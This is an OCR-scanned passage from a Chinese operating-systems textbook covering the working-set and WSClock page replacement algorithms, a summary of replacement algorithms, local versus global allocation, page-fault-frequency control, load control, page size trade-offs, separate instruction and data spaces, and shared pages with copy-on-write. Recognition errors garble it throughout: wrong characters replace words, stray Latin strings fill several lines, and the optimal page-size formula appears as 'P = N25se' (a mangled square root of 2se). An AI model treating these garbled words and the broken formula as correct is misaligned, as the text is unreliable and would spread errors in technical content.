达 ， 所 以 该 算法 忽略 了 那些 不 在 内 存 中 的 页 面 。 每 个 表 项 至 少 包含 两 条 
aa: 上 次 使 用 该 页 面 的 近似 时 间 和 RR 访问 〉 位 。 空 白 的 矩形 表示 该 
算法 不 需要 的 其 他 域 ， 如 页 框 号 、 保 护 位 、M (修改 ) 位 。 
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图 3-20 工作 集 算法 


该 算法 工作 方式 如 下 。 如 前 所 述 ， 假 定 使 用 硬件 来 置 R 位 和 M 位 。 
同样 ， 假 定 在 每 个 时 钟 滴答 中 ， 有 一 个 定期 的 时 钟 中 断 会 用 软件 方法 来 
清除 R 位 。 每 当 缺 页 中 断 发 生 时 ， 扫 描 页 表 以 找 出 一 个 合适 的 页 面 淘汰 
Lo 





在 处 理 每 个 表 项 时 ， 都 需要 检查 R 位 。 如 果 它 是 1， 就 把 当前 实际 时 
间 写 进 页 表 项 的 “上 次 使 用 时 间 ? 域 ， 以 表示 缺 页 中 断 发 生 时 该 页 面 正在 
被 使 用 。 既 然 该 页 面 在 当前 时 钟 滴答 中 已 经 被 访问 过 ， 那 么 很 明显 它 应 
该 出 现在 工作 集中 ， 并 且 不 应 该 被 删除 〈 假 定 r 横 路 多 个 时 钟 滴答 ) 。 





如 果 R 是 0， 那 么 表示 在 当前 时 钟 滴答 中 ， 该 页 面 还 没有 被 访问 过 ， 


则 它 束 可 以 作为 候选 者 被 置换 。 为 了 知道 它 是 否 应 该 被 置换 ， 需 要 计算 
它 的 生存 时 间 〈 即 当前 实际 运行 时 间 减 去 上 次 使 用 时 间 〉， 然 后 与 {做 
比较 。 如 末 它 的 生存 时 间 大 于 t， 那 么 这 个 页 面 就 不 再 在 工作 集中 ， 而 
用 新 的 页 面 置 换 它 。 扫 描 会 继续 进行 以 更 新 剩余 的 表 项 。 











然而 ， 如 果 R 是 0 同时 生存 时 间 小 于 或 等 于 t， 则 该 页 面 仍然 在 工作 
集中 。 这 样 就 要 把 该 页 面临 时 保留 下 来 ， 但 是 要 记录 生存 时 间 节 长 
4 上 次 使 用 时 间 ?” 的 最 小 值 ) 的 页 面 。 如 采 扫 描 完整 个 页 表 却 没有 找到 
适合 被 淘汰 的 页 面 ， 也 就 意味 着 所 有 的 页 面 都 在 工作 集中 。 在 这 种 情况 
下 ， 如 果 找 到 了 一 个 或 者 多 个 R=0 的 页 面 ， 就 淘汰 生存 时 间 最 长 的 页 
面 。 在 最 坏 情况 下 ， 在 当前 时 间 滴 答 中 ， 所 有 的 页 面 都 被 访问 过 了 《也 
就 是 都 有 R=1) ， 因 此 就 随机 选择 一 个 页 面 淘汰 ， 如 果 有 的 话 最 好 选 一 
个 干净 页 面 。 











3.4.9 工作 集 时 钟 页 面 置换 算法 


当 缺 页 中 断 发 生 后 ， 需 要 扫描 整个 页 表 才 能 确定 被 淘汰 的 页 面 ， 因 
此 基本 工作 集 算 法 是 比较 费时 的 。 有 一 种 改进 的 算法 ， 它 基于 时 钟 算 
法 ， 并 且 使 用 了 工作 集 信 息 ， 称 为 WSClock〔 工 作 集 时 钟 ) 算 法 (Carr 
和 Hennessey，1981) 。 由 于 它 实 现 人 简单 ， 性 能 较 好 ， 所 以 在 实际 工作 
中 得 到 了 广泛 应 用 。 


与 时 钟 算法 一 样 ， 所 需 的 数据 结构 是 一 个 以 页 框 为 元 素 的 循环 表 ， 
参见 图 3-21a。 最 初 ， 该 表 是 空 的 。 当 装 入 第 一 个 页 面 后 ， 把 它 加 到 该 
表 中 。 随 着 更 多 的 页 面 的 加 入 ， 它 们 形成 一 个 环 。 每 个 表 项 包含 来 自 基 
本 工作 集 算法 的 上 次 使 用 时 间 ， 以 及 R 位 (已 标明 〉 MIME RE 
H) 。 





当前 实际 时 间 
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图 3-21 工作 集 时 钟 页 面 置 换算 法 的 操作 : a) 和 b) 给 出 在 R=1 时 所 发 生 
的 情形 ; 中 和 由) 给 出 R=0 的 例子 





与 时 钟 算法 一 样 ， 每 次 缺 页 中 断 时 ， 首 先 检查 指针 指向 的 页 面 。 如 
果 R 位 被 置 为 1， 该 页 面 在 当前 时 钟 滴答 中 就 被 使 用 过 ， 那 么 该 页 面 就 不 
适合 被 淘汰 。 然 后 把 该 页 面 的 R 位 置 为 0%0， 指 针 指 向 下 一 个 页 面 ， 并 重复 





该 算法 。 该 事件 序列 之 后 的 状态 参见 图 3-21b。 


现在 来 考虑 指针 指向 的 页 面 在 R=0 时 会 发 生 什 么 ， 参 见 图 3-21c。 如 
果 页 面 的 生存 时 间 大 于 t 并 且 该 页 面 是 干净 的 ， 它 就 不 在 工作 集中 ， 并 
且 在 磁盘 上 有 一 个 有 效 的 副本 。 申 请 此 页 框 ， 并 把 新 页 面 放 在 其 中 ， 如 
图 3-21d 所 示 。 男 一 方面 ， 如 果 此 页 面 被 修改 过 ， 就 不 能 立即 申请 页 
框 ， 因 为 这 个 页 面 在 磁盘 上 没有 有 效 的 副本 。 为 了 避免 由 于 调度 写 磁 盘 
操作 引起 的 进程 切换 ， 指 针 继 续 向 前 走 ， 算 法 继续 对 下 一 个 页 面 进行 操 
作 。 毕 况 ， 有 可 能 存在 一 个 旧 的 且 干 净 的 页 面 可 以 立即 使 用 。 








原则 上 ， 上 所 有 的 页 面 都 有 可 能 因为 磁盘 IO 在 茶 个 时 钟 周期 被 调 
。 为 了 降低 磁盘 阻 竖 ， 需 要 设置 一 个 限制 ， 即 最 大 只 允许 写 回 n 个 页 
面 。 一 旦 达到 该 限制 ， 就 不 允许 调度 新 的 写 操 作 。 








Ke 


OAR TS AA ERE E eee aS RETA NE? 这 里 有 两 种 情 


1) 至 少 调度 了 一 次 写 操作 。 


2) 没 有 调度 过 写 操作 。 





对 于 第 一 种 情况 ， 指 针 仅仅 是 不 俘 地 移动 ， 寻 找 一 个 干 询 页 面 。 婚 
然 已 经 调度 了 一 个 或 者 多 个 写 操作 ， 最 终 会 有 某 个 写 操 作 完成 ， 它 的 页 
面 会 被 标记 为 干净 。 置 换 遇 到 的 第 一 个 干净 页 面 ， 这 个 页 面 不 一 定 是 第 





一 个 被 调度 与 操作 的 页 面 ， 因 为 硬盘 驱动 程序 为 了 优化 性 能 可 能 已 经 把 
写 操作 重 排序 了 。 





对 于 第 二 种 情况 ， 所 有 的 页 面 都 在 工作 集中 ， 人 否则 将 至 少 调度 了 一 
个 写 操 作 。 由 于 缺乏 额外 的 信息 ， 一 个 简单 的 方法 就 是 随便 置换 一 个 干 
疤 的 页 面 来 使 用 ， 扫 描 中 需要 记录 干净 页 面 的 位 置 。 如 果 不 存 在 干净 页 
面 ， 就 选 定 当 前 页 面 并 把 它 写 回 磁盘 。 


3.4.10 ”页 面 置换 算法 小 结 





我 们 已 经 考察 了 多 种 页 面 置 换算 法 ， 本 布 将 对 这 些 算 法 进行 总 络 。 
已 经 讨论 过 的 算法 在 图 3-22 中 列 出 。 
















算 法 
FIFO 先进 先 出 算法 
第 二 次 机 会 算法 
时 钟 算法 现实 的 
LRU (最近 最 少 使 用 ) 算法 很 优秀 ， 但 很 难 实现 
NFU (最 不 经 常 使 用 ) 算法 
老化 算法 
工作 集 算法 实现 起 来 开销 很 大 
工作 集 时 钟 算法 好 的 有 效 算 法 








不 可 实现 ， 但 可 用 作 基 准 
LRU 的 很 粗粮 的 近似 
可 能 抛弃 重要 页 面 
比 FIFO 有 大 的 改善 













































图 3-22 书 中 讨论 过 的 页 面 置 换算 法 





最 优 算 法 在 当前 页 面 中 置换 最 后 要 访问 到 的 页 面 。 不 注 的 是 ， 没 有 
办 法 来 判定 哪个 页 面 是 最 后 一 个 要 访问 的 ， 因 此 实际 上 该 算法 不 能 使 
Alo 然而， 它 可 以 作为 衡量 其 他 算法 的 基准 。 





NRU 算 法 根据 R 位 和 M 位 的 状态 把 页 面 分 为 四 类 。 从 编号 最 小 的 类 
中 随机 选择 一 个 页 面 置 换 。 该 算法 易于 实现 ， 但 是 性 能 不 是 很 好 ， 还 存 
在 更 好 的 算法 。 


FIFO 算 法 通过 维护 一 个 页 面 的 链表 来 记录 它们 装 入 内 存 的 顺序 。 淘 
汰 的 是 最 老 的 页 面 ， 但 是 该 页 面 可 能 仍 在 使 用 ， 因 此 FIFO 算 法 不 是 一 个 
好 的 选择 。 





第 二 次 机 会 算法 是 对 FIFO 算 法 的 改进 ， 它 在 移出 页 面前 先 检查 该 页 
面 是 否 正在 被 使 用 。 如 果 该 页 面 正 在 被 使 用 ， 就 保留 该 页 面 。 这 个 改进 
大 大 提高 了 性 能 。 时 钟 算法 是 第 二 次 机 会 算法 的 另 一 种 实现 。 它 具有 相 
同 的 性 能 特征 ， 而 且 只 需要 更 少 的 执行 时 间 。 











LRU 算 法 古 一 种 非常 优秀 的 算法 ， 但 是 只 能 通过 特定 的 人 硬件 来 实 
现 。 如 果 机 器 中 没有 该 硬件， 那么 也 无 法 使 用 该 算法 。NFU 是 一 种 近似 
于 LRU 的 算法 ， 它 的 性 能 不 是 非 第 好 ， 然 而 ， 老 化 算法 更 近似 于 LRU 并 
且 可 以 更 有 效 地 实现 ， 是 一 个 很 好 的 选择 。 


最 后 两 种 算法 都 使 用 了 工作 集 。 工 作 集 算法 有 合理 的 性 能 ， 但 它 的 
实现 开销 较 大 。 工 作 集 时 钟 算 法 是 它 的 一 种 变 体 ， 不 仅 具 有 良好 的 性 
能 ， 并 且 还 能 高 效 地 实现 。 





总 之 ， 最 好 的 两 种 算法 是 老化 算法 和 工作 集 时 钟 算法 ， 它 们 分 别 基 
于 LRU 和 工作 集 。 它 们 都 具有 民 好 的 页 面 调度 性 能 ， 可 以 有 效 地 实现 。 
也 存在 其 他 一 些 算 法 ， 但 在 实际 应 用 中 ， 这 两 种 算法 可 能 是 最 重要 的 。 








3.5 “分 页 系统 中 的 设计 问题 


在 前 儿 节 里 我 们 讨论 了 分 页 系统 是 如 何 工 作 的 ， 并 给 出 了 一 些 基 本 
的 页 面 置换 算法 和 如 何 实现 它们 。 然 而 只 了 解 基本 机 制 是 不 够 的 。 要 设 
计 一 个 系统 ， 必 须 了 解 得 更 多 才能 使 系统 工作 得 更 好 。 这 两 者 之 间 的 差 
别 就 像 知道 了 怎样 移动 象棋 的 各 种 棋子 与 成 为 一 个 好 棋 手 之 间 的 差别 。 
下 面 我 们 将 讨论 为 了 使 分 页 系统 达到 较 好 的 性 能 ， 操 作 系 统 设计 者 必须 
仔细 考虑 的 一 些 其 他 问题 。 








3.5.1 局 部 分 配 策略 与 全 局 分 配 策 略 


在 前 几 节 中 ， 我 们 讨论 了 在 发 生 缺 页 中 断 时 用 来 选择 一 个 被 置换 页 
面 的 几 个 算法 。 与 这 个 选择 相关 的 一 个 主要 问题 (到 目前 为 止 我 们 一 直 
在 小 心地 回避 这 个 问题 ) 是 ， 怎 样 在 相互 竞争 的 可 运行 进程 之 间 分 配 内 
存 。 








如 图 3-23a 所 示 ， 三 个 进程 A、B、C 构 成 了 可 运行 进程 的 集合 。 假 
如 A 发 生 了 缺 页 中 断 ， 页 面 置换 算法 在 寻找 最 近 最 少 使 用 的 页 面 时 是 只 
考虑 分 配给 A 的 6 个 页 面 呢 ? 还 是 考虑 所 有 在 内 存 中 的 页 面 ? 如 果 只 考 
虑 分 配给 A 的 页 面 ， 生 存 时 间 值 最 小 的 页 面 是 A5， 于 是 将 得 到 图 3-23b 
所 示 的 状态 。 

















图 3-23 局 部 页 面 置换 与 全 局 页 面 置换 : ams; DAA NA 
换 ; 9 全 局 页 面 置 换 


另 一 方面 ， 如 果 淘 汰 内 存 中 生存 时 间 值 最 小 的 页 面 ， 而 不 管 它 属于 
哪个 进程 ， 则 将 选中 页 面 B3， 于 是 将 得 到 图 3-23c 所 示 的 情况 。 图 3-23b 
的 算法 被 称 为 局 部 (local〉 页 面 置 换算 法 ， 而 图 3-23c 被 称 为 全 局 
(global〉 页 面 置换 算法 。 局 部 算法 可 以 有 效 地 为 每 个 进程 分 配 固 定 的 
内 存 片 段 。 全 局 算法 在 可 运行 进程 之 间 动 态 地 分 配 页 框 ， 因 此 分 配给 各 
个 进程 的 页 框 数 是 随时 间 变 化 的 。 














全 局 算法 在 通常 情况 下 工作 得 比 局 部 算法 好 ， 当 工作 集 的 大 小 随 进 
程 运行 时 间 发 生变 化 时 这 种 现象 更 加 明显 。 大 使 用 局 部 算法 ， 即 使 有 大 





量 的 空闲 页 框 存 在 ， 工 作 集 的 增长 也 会 导致 题 艘 。 如 果 工 作 集 缩小 了 ， 
局 部 算法 又 会 浪费 内 存 。 在 使 用 全 局 算法 时 ， 系 统 必须 不 停 地 确定 应 该 
给 每 个 进程 分 配 多少 页 框 。 一 种 方法 是 监测 工作 集 的 大 小 ， 工 作 集 大 小 
由 “老化 ”位 指出 ， 但 这 个 方法 并 不 能 防止 颠 盘 。 因 为 工作 集 的 大 小 可 能 
在 几 微 秒 内 就 会 发 生 改 变 ， 而 老化 位 却 要 经 历 一 定 的 时 钟 滴答 数 才 会 发 
EIE 








Fy VR A Fe NE AEE PC UE RA. HATA EE 
期 确定 进程 运行 的 数目 并 为 它们 分 配 相等 的 份额 。 例 如 ， 在 有 12 416 个 
有 效 《 即 未 被 操作 系统 使 用 的 ) 页 框 和 10 个 进程 时 ， 每 个 进程 将 获得 
1241 个 页 框 ， 剩 下 的 6 个 被 放 入 到 一 个 公用 凶 中 ， 当 发 生 缺 页 中 断 时 可 
以 使 用 这 些 页 面 。 





这 个 算法 看 起 来 好 像 很 公平 ， 但 是 给 一 个 10KB 的 进程 和 一 个 
300KB 的 进程 分 配 同 样 大 小 的 内 存 块 是 很 不 合理 的 。 可 以 采用 按照 进程 
大 小 的 比例 来 为 它们 分 配 相 应 数目 的 页 面 的 方法 来 取代 上 一 种 方法 ， 这 
样 300KB 的 进程 将 得 到 10KB 进 程 30 倍 的 份额 。 比 较 明 智 的 一 个 可 行 的 
做 法 是 对 每 个 进程 都 规定 一 个 最 小 的 页 框 数 ， 这 样 不 论 多 么 小 的 进程 都 
可 以 运行 。 例 如 ， 在 某 些 机 器 上 ， 一 条 两 个 操作 数 的 指令 会 需要 多 达 6 
个 页 面 ， 因 为 指令 目 身 、 源 操作 数 和 目的 操作 数 可 能 会 路 越 页 面 边 界 ， 
在 只 给 一 条 这 样 的 指令 分 配 了 5 个 页 面 ， 则 包含 这 样 的 指令 的 程序 根本 
无 法 运行 。 











如 果 使 用 全 局 算法 ， 根 据 进程 的 大 小 按 比 例 为 其 分 配 页 面 也 是 可 能 
的 ， 但 是 该 分 配 必 须 在 程序 运行 时 动态 更 新 。 管 理 内 存 动态 分 配 的 一 种 
方法 是 使 用 PFF (Page Fault Frequency, RPX) 算法 。 它 指出 了 
何 时 增加 或 减少 分 配给 一 个 进程 的 页 面 ， 但 却 完 全 没有 说 明 在 发 生 缺 页 
中 断 时 应 该 蔡 换 掉 哪 一 个 页 面 ， 它 仅仅 控制 分 配 集 的 大 小 。 














正如 我 们 上 面 讨 论 过 的 ， 有 一 大 类 页 面 置换 算法 〈 包 括 LRU 在 
AL) ， 缺 页 中 断 率 都 会 随 着 分 配 的 页 面 的 增加 而 降低 ， 这 是 PFF 背 后 的 
假定 。 这 一 性 质 在 图 3-24 中 说 明 。 





分 配 的 页 帧 数 


图 3-24 RAR PRR ALY HER BH 


HN EER DAT AR IK ce BS SN: 计算 每 秒 的 缺 页 中 断 数 ， 可 
能 也 会 将 过 去 数秒 的 情况 做 连续 平均 。 一 个 简单 的 方法 是 将 当前 这 一 秒 
的 值 加 到 当前 的 连续 平均 值 上 然后 除 以 2。 虚 线 A 对 应 于 一 个 高 得 不 可 


接受 的 缺 页 中 断 率 ， 虚 线 B 则 对 应 于 一 个 低 得 可 以 假设 进程 拥有 过 多 内 
存 的 缺 页 中 断 率 。 在 这 种 情况 下 ， 可 能 会 从 该 进程 的 资源 中 和 剥夺 部 分 页 
框 。 这 样 ，PFF 尽 力 让 每 个 进程 的 缺 页 中 断 率 控制 在 可 接受 的 范围 内 。 

















值得 注意 的 是 ， 一 些 页 面 置换 算法 既 适 用 于 局 部 置换 算法 ， 又 适用 
于 全 局 置换 算法 。 例 如 ，FIFO 能 够 将 所 有 内 存 中 最 老 的 页 面 置换 掉 ( 全 
局 算法 ) ， 也 能 将 当前 进程 的 页 面 中 最 老 的 亚 换 挥 〈( 局 部 算法 ) 。 相 似 
地 ，LRU 或 是 一 些 类 似 算 法 能 够 将 所 有 内 存 中 最 近 最 少 访问 的 页 框 蔡 换 
掉 《〈 全 局 算法 ) ， 或 是 将 当前 进程 中 最 近 最 少 使 用 的 页 框 蔡 换 掉 《〈 局 部 
GUL) 。 在 茶 些 情况 下 ， 选 择 局 部 集 略 还 是 全 局 策略 是 与 页 面 置 换算 法 
TERA o 
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义 。 特 别 是 工作 集 和 WSClock 算 法 是 针对 东 些 特定 进程 的 而 且 必 须 应 用 
在 这 些 进程 的 上 下 文中 。 实 际 上 没有 针对 整个 机 占 的 工作 集 ， 并 且 试 图 
使 用 万 有 工作 集 的 并 集 作 为 机 器 的 工作 集 可 能 会 丢失 一 些 局 部 特性 ， 这 
样 算法 就 不 能 得 到 好 的 性 能 。 











3.5.2 ”负载 控制 


即使 是 使 用 最 优 页 面 置 换算 法 并 对 进程 采用 理想 的 全 局 页 框 分 配 ， 
系统 也 可 能 会 发 生 颠 艇 。 事 实 上 ， 一 旦 所 有 进程 的 组 合 工作 集 超出 了 内 
存 容 量 ， 就 可 能 发 生生 艘 。 该 现象 的 症状 之 一 就 是 如 PFF 算 法 所 指出 
的 ， 一 些 进程 需要 更 多 的 内 存 ， 但 是 没有 进程 需要 更 少 的 内 存 。 在 这 种 
情况 下 ， 没 有 方法 能 够 在 不 影响 其 他 进程 的 情况 下 满足 那些 需要 更 多 内 
存 的 进程 的 需要 。 人 惟一 现实 的 解决 方案 束 是 暂时 从 内 存 中 去 挥 一 些 进 


程 。 


减少 竞争 内 存 的 进程 数 的 一 个 好 方法 是 将 一 部 分 进程 交换 到 磁盘 ， 
并 释放 他 们 所 占有 的 所 有 页 面 。 例 如 ， 一 个 进程 可 以 被 交换 到 磁盘 ， 而 
TE AY UAE BY DA BE Bh PURER ASIN HERE OT WRU IE, RAE 
PEIX PEST EIN TH). MRAR, a BEARERS TE AEC IR 
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现在 交换 是 用 来 减少 对 内 存 潜在 的 需求 ， 而 不 是 收回 它 的 页 面 。 





将 进程 交换 出 去 以 减轻 内 存 需求 的 压力 是 借用 了 两 级 调度 的 思想 ， 
在 此 过 程 中 一 些 进程 被 放 到 磁盘 ， 此 时 用 一 个 短期 的 调度 程序 来 调度 剩 
余 的 进程 。 很 明显 ， 这 两 种 思路 可 以 被 组 合 起 来 ， 将 恰好 足够 的 进程 区 
换 出 去 以 获取 可 接受 的 缺 页 中 断 率 。 一 些 进程 被 周期 性 地 从 磁盘 调 入 ， 








而 其 他 一 些 则 被 周期 性 地 交换 到 磁盘 。 


不 过 ， 男 一 个 需要 考虑 的 因素 是 多 道 程序 设计 的 道 数 。 当 内 存 中 的 
进程 数 过 低 的 时 候 ，CPU 可 能 在 很 长 的 时 间 内 处 于 空间 状态 。 考 虑 到 该 
因素 ， 在 决定 交换 出 哪个 进程 时 不 光 要 考虑 进程 大 小 和 分 页 率 ， 还 要 考 
处 它 的 特性 “如 它 完 疯 是 CPU 密集 型 还 是 IO 密集 型 ) 以 及 其 他 进程 的 


特性 。 


3.5.3 ”页面 大 小 


页 面 大 小 是 操作 系统 可 以 选择 的 一 个 参数 。 例 如 ， 即 使 硬件 设计 只 
支持 512 字 节 的 页 面 ， 操 作 系 统 也 可 以 很 容易 通过 总 是 为 页 面 对 0 和 1、2 
和 3、4 和 5 等 分 配 两 个 连续 的 512 字 节 的 页 框 ， 而 将 其 作为 1KB 的 页 面 。 














要 确定 最 佳 的 页 面 大 小 需要 在 儿 个 互相 矛盾 的 因素 之 间 进 行 权衡 。 
从 结果 看 ， 不 存在 全 局 最 优 。 首先 ， 有 两 个 因素 可 以 作为 选择 小 页 面 的 
理由 。 随 便 选 择 一 个 正文 段 、 数 据 段 或 堆栈 段 很 可 能 不 会 恰好 装 满 整数 
个 页 面 ， 平 均 的 情况 下 ， 最 后 一 个 页 面 中 有 一 半 是 空 的 。 多 余 的 空间 殊 
被 浪费 挥 了 ， 这 种 浪费 称 为 内 部 健 片 (internal fragmentation) 。 在 内 存 
中 有 n 个 段 、 页 面 大 小 为 p 字 节 时 ， 会 有 np/2 字 节 被 内 部 人 雄 片 浪费 。 从 这 
方面 考虑 ， 使 用 小 页 面 更 好 。 











选择 小 页 面 还 有 一 个 明显 的 好 处 ， 如 果 考 虑 一 个 程序 ， 它 分 成 8 个 
阶段 顺序 执行 ， 每 阶段 需要 4KB 内 存 。 如 果 页 面 大 小 是 32KB， 那 就 必 
须 始终 给 该 进程 分 配 32KB 内 存 。 如 果 页 面 大 小 是 16KB， 它 就 只 需要 
16KB。 如 采 页 面 大 小 是 4KB 或 更 小 ， 在 任何 时 刻 它 只 需要 4KB 内 存 。 总 
的 来 说 ， 与 小 页 面相 比 ， 大 页 面 使 更 多 没有 用 的 程序 保留 在 内 存 中 。 





在 为 一 方面 ， 页 面 小 意味 痢 程 序 需 要 更 多 的 页 面 ， 这 义 意 味 着 需要 
更 大 的 页 表 。 一 个 32KB 的 程序 只 需要 4 个 8KB 的 页 面 ， 却 需要 64 个 512 








字 贡 的 页 面 。 内 存 与 磁盘 之 间 的 传输 一 般 是 一 次 一 页 ， 传 输 中 的 大 部 分 
时 间 都 花 在 了 寻 道 和 旋转 延迟 上 ， 所 以 传输 一 个 小 的 页 面 所 用 的 时 间 和 
传输 一 个 大 的 页 面 基 本 上 是 相同 的 。 装 入 64 个 512 字 节 的 页 面 可 能 需要 
64x10ms， 而 装 入 4 个 8KB 的 页 面 可 能 只 需要 4x12ms。 











在 茶 些 机 器 上 ， 每 次 CPU 从 一 个 进程 切换 到 为 一 个 进程 时 都 必须 把 
新 进程 的 页 表 装 入 硬件 寄存 器 中 。 这 样 ， 页 面 越 小 意味 着 闭 入 页 面 寄存 
强化 费 的 时 间 丈 会 越 长 ， 而 且 页 表 占 用 的 空间 也 会 随 着 页 面 的 减 小 而 增 
大 。 





最 后 一 点 可 以 从 数学 上 进行 分 析 ， 假 设 进程 平均 大 小 是 s 个 字 节 ， 
页 面 大 小 是 p 个 字 节 ， 每 个 页 表 项 需要 e 个 字 节 。 那 么 每 个 进程 需要 的 页 
数 大 约 是 s/p， 占 用 了 se/p 个 字 节 的 页 表 空 间 。 内 部 碎片 在 最 后 一 页 浪费 
的 内 存 是 p/2。 因 此 ， 由 页 表 和 内 部 碎片 损失 造成 的 全 部 开销 是 以 下 两 
项 之 和 : 








开销 =se/p+p/2 


在 页 面 比较 小 的 时 候 ， 第 一 项 (页 表 大 小 ， 大。 在 页 面 比较 大 时 第 
二 项 《内 部 碎片 ) 大。 最 优 值 一 定 在 页 面 大 小 处 于 中 间 的 茶 个 值 时 取 
得 ， 通 过 对 p 一 次 求 导 并 令 右 边 等 于 零 ， 我 们 得 到 方程 : 





-se/p* +1/2=0 








从 这 个 方程 可 以 得 出 最 优 页 面 大 小 的 公式 (只 考虑 雄 片 浪费 和 页 表 
HERAF) > MRE: 


P = N25se 


对 于 s=1MB 和 每 个 页 表 项 e=8 个 字 节 ， 最 优 页 面 大 小 是 4KB。 商 用 
计算 机 使 用 的 页 面 大 小 一 般 在 512 字 节 到 64KB 之 间 ， 以 前 的 典型 值 是 
1KB， 而 现在 更 常见 的 页 面 大 小 是 4 KB 或 8KB。 随 着 存储 器 越 来 越 大 ， 
页 面 也 倾向 于 更 大 (但 不 是 线性 的 ) 。 把 RAM 扩 大 4 倍 极 少 会 使 页 面 大 
小 加 倍 。 











3.5.4 分离 的 指令 空间 和 数据 空间 


大 多 数 计算 机 只 有 一 个 地 址 空间 ， 既 存放 程序 也 存放 数据 ， 如 图 3- 
25a 所 示 。 如 采 地 址 空间 足够 大 ， 那 么 一 切 都 好 。 然 而 ， 地 址 空间 通常 
大 小 了 ， 这 就 使 得 程序 员 对 地 址 空间 的 使 用 出 现 困 难 。 








} 未 使 用 页 面 





b) 
图 3-25 引 单 个 地 址 空间 ; b) 分 离 的 [空间 和 DD 空间 


首先 在 PDP-11 (16 位 ， 上 实现 的 一 种 解决 方案 是 ， 为 指令 程序 正 
X) 和 数据 设置 分 离 的 地 址 空间 ， 分 别称 为 I 空间 和 DD 空间 ， 如 图 3-25b 
所 示 。 每 个 地 址 空间 都 从 0 开始 到 某 个 最 大 值 ， 比 较 有 代表 性 的 是 2 -1 
或 者 23 -1。 链 接 器 必须 知道 何 时 使 用 分 离 的 I 空 间 和 D 空 间 ， 因 为 当 使 
用 它们 时 ， 数 据 被 重 定 位 到 虚拟 地 址 0， 而 不 是 在 程序 之 后 开始 。 








在 使 用 这 种 设计 的 计算 机 中 ， 两 种 地 址 空间 都 可 以 进行 分 页 ， 而 且 


互相 独立 。 它 们 分 别 有 目 己 的 页 表 ， 分 别 完 成 虚拟 页 面 到 物理 页 框 的 映 
财 。 当 人 硬件 进行 取 指 令 操作 时 ， 它 知道 要 使 用 I 空间 和 I 空间 页 表 。 类 似 
地 ， 对 数据 的 访问 必须 通过 DD 空间 页 表 。 除 了 这 一 区 别 ， 拥 有 分 离 的 I 空 
间 和 DD 空间 不 会 引入 任何 复杂 的 设计 ， 而 且 它 还 能 使 可 用 的 地 址 空间 加 


倍 。 





3.5.5 Enh 


另 一 个 设计 问题 是 共享 。 在 大 型 多 道 程 序 设计 系统 中 ， 几 个 不 同 的 
用 户 同 时 运行 同一 个 程序 是 很 常见 的 。 显 然 ， 由 于 避免 了 在 内 存 中 有 一 
个 页 面 的 两 份 副本 ， 共 享 页 面 效率 更 高 。 这 里 存在 一 个 问题 ， 即 并 不 是 
所 有 的 页 面 都 适合 共享 。 特 别 地 ， 那 些 只 读 的 页 面 〈 诸 如 程序 文本 ) 可 
以 共 译 但 是 数据 页 面 则 不 能 











如 果 系 统 支 持 分 离 的 I 空间 和 DD 空间 ， 那 么 通过 让 两 个 或 者 多 个 进程 
来 共享 程序 就 变 得 非常 简单 了 ， 这 些 进程 使 用 相同 的 I 空间 页 表 和 不 同 
的 D 空 间 页 表 。 在 一 个 比较 典型 的 使 用 这 种 方式 来 支持 共享 的 实现 中 ， 
页 表 与 进程 表 数 据 结构 无 关 。 每 个 进程 在 它 的 进程 表 中 都 有 两 个 指针 
一 个 指向 I 空 间 页 表 ， 一 个 指向 D 空 间 页 表 ， 如 图 3-26 所 示 。 当 调度 程序 
选择 一 个 进程 运行 时 ， 它 使 用 这 些 指针 来 定位 合适 的 页 表 ， 并 使 用 它们 
来 设立 MMU。 即 使 没有 分 离 的 I 空间 和 DD 空间 ， 进 程 也 可 以 共享 程序 
(或 者 有 时 为 库 ) ,但 要 使 用 更 为 复杂 的 机 制 。 
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图 3-26 两 个 进程 通过 共享 程序 页 表 来 共享 同一 个 程序 


在 两 个 或 更 多 进程 共享 某 些 代码 时 ， 在 共享 页 面 上 存在 一 个 问题 。 
假设 进程 A 和 进程 B 同 时 运行 一 个 编辑 器 并 共 衬 页 面 。 如 采 调 度 程序 决 
定 从 内 存 中 移 走 A， 撤 销 其 所 有 的 页 面 并 用 一 个 其 他 程序 来 填充 这 些 空 
的 页 框 ， 则 会 引起 B 产 生 大 量 的 缺 页 中 断 ， 才 能 把 这 些 页 面 重 新 调 入 。 











类 似 地 ， 当 进程 A 结 束 时 ， 能 够 发 现 这 些 页 面 仍然 在 被 使 用 是 非常 
必要 的 ， 这 样 ， 这 些 页 面 的 磁盘 空间 才 不 会 被 随意 释放 。 和 碍 找 所 有 的 页 


表 ， 考 察 一 个 页 面 是 任 共 译 ， 其 代价 通常 比较 大 ， 所 以 需要 专门 的 数据 
结构 记录 共 至 页 面 ， 特 别 地 ， 如 果 共 至 的 单元 古 单个 页 面 ( 或 一 批 页 
面 ) ， 而 不 是 整个 页 表 。 











共 孚 数据 要 比 共 阐 代 码 麻 烦 ， 但 也 不 是 不 可 能 。 特 别 是 在 UNIX 
中 ， 在 进行 fork 系 统 调用 后 ， 父 进程 和 子 进程 要 共 至 程序 文本 和 数据 。 
在 分 页 系统 中 ， 通 第 是 让 这 些 进 程 分 别 拥有 它们 上 自己 的 页 表 ， 但 都 指 同 
同一 个 页 面 集合 。 这 样 在 执行 fork 调 用 时 就 不 需要 进行 页 面 复 制 。 然 
而 ， 所 有 了 映射 到 两 个 进程 的 数据 页 面 都 是 只 读 的 。 














只 要 这 两 个 进程 都 仅仅 是 读数 据 ， 而 不 做 更 改 ， 这 种 情况 就 可 以 保 
持 下 去 。 但 只 要 有 一 个 进程 更 新 了 一 点 数据 ， 就 会 触及 只 读 保护 ， 并 引 
发 操作 系统 陷阱 。 然 后 会 生成 一 个 该 页 的 副本 ， 这 样 每 个 进程 都 有 自己 
的 专用 副本 。 两 个 复制 都 是 可 以 读 写 的 ， 随 后 对 任何 一 个 副本 的 写 操作 
都 不 会 再 引发 陷阱 。 这 种 策略 意味 看 那些 从 来 不 会 执行 写 操作 的 页 面 
(包括 所 有 程序 页 面 〉 是 不 需要 复制 的 ， 只 有 实际 修改 的 数据 页 面 需 要 
复制 。 这 种 方法 称 为 写 时 复制 ， 它 通过 减少 复制 而 提高 了 性 能 。 








3.5.6 HZH 
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动 两 次 ， 大 多 数 操作 系统 会 自动 共享 所 有 的 代码 页 面 ， 而 在 内 存 中 只 保 
留 一 份 代码 页 面 的 副本 。 代 码 页 面 总 是 只 读 的 ， 因 此 这 样 做 不 存在 任何 
问题 。 依 赖 于 不 同 的 操作 系统 ， 每 个 进程 都 拥有 一 份 数 据 页 面 的 私有 副 
本 ， 或 者 这 些 数据 页 面 被 共 吝 并 且 被 标记 为 只 读 。 如 果 任 何 一 个 进程 对 
